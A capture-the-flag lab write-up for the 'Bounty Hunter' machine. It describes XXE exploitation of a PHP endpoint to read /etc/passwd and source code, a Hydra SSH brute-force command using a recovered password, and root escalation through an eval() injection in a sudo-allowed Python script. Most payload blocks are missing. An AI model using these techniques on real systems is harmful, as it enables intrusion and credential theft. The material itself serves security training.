Bounty Hunter

NMAP

Copy to Clipboard

ENUMERATION

When we first hit the page we are presented with a page that mentions “Security Researchers can use Burp”

After some fuzzing and browsing around we find a directory listing with a handful of files in it but one contains some dev notes.

Dev notes / Tasks list (really not helpful here):

http://10.129.193.21/resources/README.txt

The bountylog.js file indicates that we may be able to use an XML External Entity attack!http://10.129.193.21/resources/bountylog.js

USER

When reviewing the POST request made to http://10.129.193.21/tracker_diRbPr00f314.php which occurs when clicking the Submit button on http://10.129.193.21/log_submit.php we see there is a data parameter that is sent if we catch this in burp:

So this looks like base64 but it is noticeable that there is some URL Encoding going on here as well hence the %2B occurring as the last item in the above data parameter. Highlight the data, and remove the URL Encoding using Ctrl+Shift-U and then decode the base64 from that output using Ctrl+Shift-B.

This presents us with:

Now let’s have a look at how we can utilize an XXE attack against this input! Having a look at: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing, we can utilize a basic XXE payload from here.
As a proof of concept which we will end up using later, utilizing the following payload:

Copy to Clipboard

Base64 encoded:

Copy to Clipboard

URL encoded:

Copy to Clipboard

Provides us with the /etc/passwd file in the <title> block

/etc/passwd :

Copy to Clipboard

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System
(admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network
Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd
Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time
Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
sshd:x:111:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
development:x:1000:1000:Development:/home/development:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin

As we are trying to retrieve php source we can use a trick ( php://filter/convert.base64-encode/resource= ) to get the source code without it executing on the server, but it does come back as Base64 and needs to be decoded.
Cleartext payload:

Copy to Clipboard

Base64 Encoded:

Copy to Clipboard

URL Encoded:

Copy to Clipboard

Provides:

Copy to Clipboard

When we decode the string

Copy to Clipboard

from base64 we are presented with the database credentials:

Copy to Clipboard

Now we have two things, usernames and credentials, lets push on port 22 with a bruteforce login attempt to see if these creds work for any of our enumerated users. I pasted the contents of the recovered /etc/passwd file into a file named etc_passwd on my machine and extracted the users with the command cat etc_passwd | cut -f 1 -d “:” > users.txt which quickly provides a nice list:

Copy to Clipboard

Using Hydra we can attempt to brute force the logins using:
Command: hydra -L users.txt -p ‘m19RoAU0hP41A1sTsq6K’ 10.129.193.21 ssh

We found creds: development:m19RoAU0hP41A1sTsq6K

ROOT

Always check for the low hanging fruit first, here we run sudo -l to list the commands our development user can run with privileges and are presented with the following:

Having a look at the ticketValidator.py script:

Copy to Clipboard

#Skytrain Inc Ticket Validation System 0.1
#Do not distribute this file.

def load_file(loc):
    if loc.endswith(".md"): # checks to make sure the filename ends with .md otherwise, exit
        return open(loc, 'r')
    else:
        print("Wrong file type.")
        exit()

def evaluate(ticketFile):
    #Evaluates a ticket to check for ireggularities.
    code_line = None
    for i,x in enumerate(ticketFile.readlines()):
        if i == 0:
            if not x.startswith("# Skytrain Inc"): # .md file must start with this string
                return False
            continue
        if i == 1:
            if not x.startswith("## Ticket to "): # second line must start with this string
                return False
            print(f"Destination: {' '.join(x.strip().split(' ')[3:])}") # strips beginning and end spaces then splits the string at spaces and adds the destination provided after the third space
            continue

if x.startswith("__Ticket Code:__"): # Third line must start with this string
            code_line = i+1
            continue

if code_line and i == code_line:
            if not x.startswith("**"): # Fourth line must start with **
                return False
            ticketCode = x.replace("**", "").split("+")[0] # Strips '**' splits on the first + symbol and assigns sting / integers at position 0 to the ticketCode' variable
            if int(ticketCode) % 7 == 4: # checks that the variable ticketcode (has to be greater than 100) modulo 7 is equal to 4 (this could be 102, 109 etc.)
                validationNumber = eval(x.replace("**", "")) # runs an eval on the provided string (this is where we can inject our code to get root)
                if validationNumber > 100:
                    return True
                else:
                    return False
    return False

def main():
    fileName = input("Please enter the path to the ticket file.\n")
    ticket = load_file(fileName)
    #DEBUG print(ticket)
    result = evaluate(ticket)
    if (result):
        print("Valid ticket.")
    else:
        print("Invalid ticket.")
    ticket.close

main()

Lets create the markdown file to exploit root:apple.md

Copy to Clipboard

The apple.md file spawns a new root bash shell.

Happy Hacking Folks!
Cheerz